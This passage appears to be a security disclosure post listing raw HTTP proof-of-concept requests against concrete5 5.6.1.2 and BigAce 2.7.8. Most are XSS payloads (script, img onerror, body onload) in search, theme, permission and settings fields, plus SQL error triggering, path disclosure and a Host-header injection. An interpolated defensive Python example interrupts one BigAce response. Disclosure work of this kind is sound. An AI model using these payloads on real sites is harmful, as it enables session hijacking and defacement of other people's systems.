&autosave=0&ccm_token=1376298893:60a85801b0c4f4b73d887a387b4a0aa2" --cookie "CONCRETE5=obo3k5oa1b23mdfkmjai0ka8n3;
CONCRETE5=p5kvcagr4fv6n9p75ojqdbst25; CONCRETE5_INSTALL_TEST=1"

Example of SQL Injection



2.  DOM-based XSS
---< request >---

POST /concrete5/concrete5.6.1.2/index.php/tools/required/files/importers/single HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1119

-----------------------------55721791519552
Content-Disposition: form-data; name="Filedata"; filename="2ASK.txt"
Content-Type: text/plain

sialala cze;]
-----------------------------55721791519552
Content-Disposition: form-data; name="searchInstance"

');</script><script>alert(2);</script>//
-----------------------------55721791519552
Content-Disposition: form-data; name="ccm_token"

1376287516:62ba4fa101db6bfb5a15c832e2839c1b
-----------------------------55721791519552
Content-Disposition: form-data; name="ocID"


-----------------------------55721791519552--
---< request >---


---< response >---
window.parent.ccm_filesUploadedDialog('');</script><script>alert(2);</script>//');
---< response >---

3. sql error to check

---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/pages/search_results?searchInstance=page1376287517&submit_search=1&ccm_order_dir=&ccm_order_by=&cvName=asd&ctID=&numResults=11111111111111111111111&ccm-search-pages=Search&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


resp:

<h1>An unexpected error occurred.</h1>

<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right syntax to use near '11111111111111111111111' at line 1]
in EXECUTE("select p1.cID, pt.ctHandle  from Pages p1 left join PagePaths on (PagePaths.cID = p1.cID and PagePaths.ppIsCanonical = 1) left
join PageSearchIndex psi on (psi.cID = p1.cID) inner join CollectionVersions cv on (cv.cID = p1.cID and cvID = (select max(cvID) from CollectionVersions
where cID = cv.cID)) left join PageTypes pt on (pt.ctID = cv.ctID)  inner join Collections c on (c.cID = p1.cID) left join CollectionSearchIndexAttributes on
(CollectionSearchIndexAttributes.cID = p1.cID)  where 1=1 and cvName like '%asd%' and (p1.cPointerID < 1 or p1.cPointerID is null) and p1.cIsTemplate = '0'
and p1.cIsActive = '1' and (p1.cIsSystemPage = 0) limit 0,11111111111111111111111 ")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2" class="btn">&lt; Back to Home</a></p>
</div>




4. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(22)</script>XXX&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


5. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir="><script>alert(1)</script>&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


6. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by="><script>alert(4)</script>&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


7. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(5)</script>&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


8. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults='%3e"%3e&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---

resp:


Warning: Division by zero in /var/www/concrete5/concrete5.6.1.2/concrete/core/libraries/item_list.php on line 263
<div class="ccm-paging-top">Viewing <b>1</b> to <b><span id="pagingPageResults">0</span></b> (<b><span id="pagingTotalResults">54</span></b> Total)</div></div>

</div>
<div class="ccm-pane-footer">

9. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField="><script>alert(33)</script>"%3eXXX&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


10. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---

resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 06:25:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html


Fatal error: Call to a member function getAttributeType() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/controllers/single_pages/dashboard/files/search.php on line 134


11. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(1111)</script>&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


12. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir="><script>alert(123)</script>&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


13. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by="><script>alert(/1/)</script>XXX&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


14. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(2)</script>&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


15. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/save_mobile_theme/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 94

MOBILE_THEME_ID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&save_mobile_theme=Save
---< request >---

16. XSS in SQL query error msg:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/types/add/do_add/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 187

ccm_token=1376290923%3Acf6fd358ef1afdfbf6d0206725a108b4&task=add&ctName=asdasdasd&ctHandle=asdasdasdasd&ctIcon='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&ccm-submit-add_page_type=Add
---< request >---

resp:
       
    <div class="alert alert-error"><button type="button" class="close" data-dismiss="alert">×</button>
            mysql error: [1062: Duplicate entry 'asdasdasdasd' for key 'ctHandle'] in EXECUTE("insert into PageTypes (ctHandle, ctName, ctIcon, ctIsInternal, pkgID) values ('asdasdasdasd', 'asdasdasd', '\'>\"><body onload=alert(/4321/)>', 0, 0)")
<br/>
        </div>
       

       
17. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/users/attributes/edit/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 314

akID=10&akHandle=profile_private_messages_enabled&akName=%2f#%3csvg%2fonload%3dalert(4321)%3e&asID=0&akIsSearchableIndexed=1&akIsSearchable=1&atID=3&akCategoryID=2&ccm_token=1376290584%3A871b3d29741d11ea375c5803f202ce16&uakProfileEdit=1&uakRegisterEdit=1&akCheckedByDefault=1&ccm-submit-ccm-attribute-key-form=Save
---< request >---

18. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 971

input_theme_style_body-background_1='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


resp:


<input type="hidden" name="input_theme_style_body-background_1" id="input_theme_style_body-background_1" value="'>"><img/src="x"/onerror="alert(4321)">" />                       
<div class="ccm-theme-style-color " id="theme_style_body-background_1"><div hex-color="'>"><img/src="x"/onerror="alert(4321)">" style="background-color: '>"><img/src="x"/onerror="alert(4321)">"></div></div>
                       
                       
19. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

20. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

21. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

22. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

paID=60&blockTypesIncluded%5B1%5D=A
---< request >---

resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:15:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 359
Connection: close
Content-Type: text/html


Catchable fatal error: Argument 2 passed to Concrete5_Model_PermissionAccess::getByID() must be an instance of PermissionKey, null given, called in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 23 and defined in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/access/model.php on line 206


23. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID=16 HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

paID="%20body%20onload%3d"alert(4321)"%3e&blockTypesIncluded%5B1%5D=A
---< request >---


resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:16:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 165
Connection: close
Content-Type: text/html


Fatal error: Call to a member function save() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 24

24. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1033

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


25. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


26. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


27. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 965

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


28. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 952

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1="%20body%20onload%3d"alert(4321)"%3e&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

29. information disclosure
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/access_entity HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

task=save_permissions&accessType=10&peID=6&pdID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&pdStartDate_activate=on&pdStartDate_dt=8%2F12%2F2013&pdStartDate_h=9&pdStartDate_m=16&pdStartDate_a=AM&pdEndDate_activate=on&pdEndDate_dt=8%2F12%2F2013&pdEndDate_h=9&pdEndDate_m=16&pdEndDate_a=AM&pdRepeatPeriod=&pdRepeatPeriodDaysEvery=1&pdRepeatPeriodMonthsRepeatBy=month&pdRepeatPeriodMonthsEvery=1&pdRepeatPeriodWeeksDays%5B%5D=1&pdRepeatPeriodWeeksEvery=1&pdEndRepeatDate=
---< request >---


resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:19:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html


Fatal error: Call to a member function setStartDateAllDay() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/duration.php on line 205


30. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/basics/site_name/update_sitename/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 142

ccm_token=1376292237%3A47e17cc29a3b0e20cd35e618aebc20d8&SITE='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&ccm-submit-site-form=Save
---< request >---

31. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/tracking_codes/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 190

ccm_token=1376292246%3A18fb91291997356ac1a2f84e7edd3e07&tracking_code='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&tracking_code_position=bottom&ccm-submit-tracking-code-form=Save
---< request >---


32. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/excluded/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 87

SEO_EXCLUDE_WORDS='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&ccm-submit-button=Save
---< request >---

33. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 210

miID=1&miEmail='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&miIsEnabled=0&miServer=asd&miUsername=asd&miPassword=asd&miEncryption=&miPort=asd&miConnectionMethod=POP&ccm-submit-mail-importer-form=Save
---< request >---

Let me know if you have any questions.

Enjoy ;)

[EN] BigAce 2.7.8 Multiple bugs

Last week I saw that Yashar Shahinzadeh had found a vulnerability in the latest version of BigAce CMS.

I decided to check it again, and I found a few other things, described below.

I. For a normal registered ('anonymous') user:


1. Escaping from the source code via the Host header:

---< request >---
GET /bigace/public/index.php?cmd=smarty&id=-1_len HTTP/1.1
Host: 1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=t02veplpq601tanqc9ugm5sas1
Connection: close
---< request >---

Response:
 <link rel="stylesheet" href="http://1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e/bigace/public/cid1/spring_flavour/style.css" type="text
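The response above shows the stylesheet URL being built straight from the request's Host header, which is why anything placed in that header lands in the page source. The following is an added example, not code from the advisory or from BigAce itself: the host is checked against a configured allow-list of hostnames before it is used to build an absolute URL, and the URL is entity-encoded when rendered. The allow-list, canonical hostname, stylesheet path and helper names are assumptions made for illustration.

```python
"""Build absolute URLs from a validated host rather than the raw Host header.

Added example (not BigAce code). Hostnames, paths and function names are
assumptions for illustration.
"""
import html
import re

# Constructed configuration: hostnames this installation is allowed to answer to.
ALLOWED_HOSTS = {"www.example.test", "10.149.14.52"}
CANONICAL_HOST = "www.example.test"

# Constructed sample, shaped like the Host header in the request above.
SAMPLE_BAD_HOST = ('1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">'
                   'aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e')

# Hostname labels per RFC 1123 with an optional :port. Quotes, '%', '<' and
# spaces cannot match, so a header like SAMPLE_BAD_HOST is rejected outright.
_HOST_RE = re.compile(
    r"^(?P<host>[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*)"
    r"(?::(?P<port>[0-9]{1,5}))?$")


def validated_host(host_header, allowed=ALLOWED_HOSTS, fallback=CANONICAL_HOST):
    """Return the host (lower-cased, port kept) to use in generated URLs.

    A syntactically invalid host, or one not on the allow-list, is replaced
    by the configured canonical host instead of being echoed back.
    """
    if host_header is None:
        return fallback
    m = _HOST_RE.match(host_header.strip())
    if m is None or m.group("host").lower() not in allowed:
        return fallback
    port = m.group("port")
    return m.group("host").lower() + (":" + port if port else "")


def stylesheet_link(host_header, path="/bigace/public/cid1/spring_flavour/style.css"):
    """Render the <link> tag from the response above, from a validated host."""
    url = "http://" + validated_host(host_header) + path
    # Entity-encode on output as well, so the value stays inside href="...".
    return '<link rel="stylesheet" href="%s" type="text/css">' % html.escape(url, quote=True)


if __name__ == "__main__":
    print(stylesheet_link("10.149.14.52"))
    print(stylesheet_link(SAMPLE_BAD_HOST))  # falls back to the canonical host
```

The allow-list is the important part: output encoding alone would keep the header inside the attribute, but the page would still point browsers at whatever host the request named.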


II. For a logged-in editor user:

1. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D='>"><script>alert(2)</script>&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


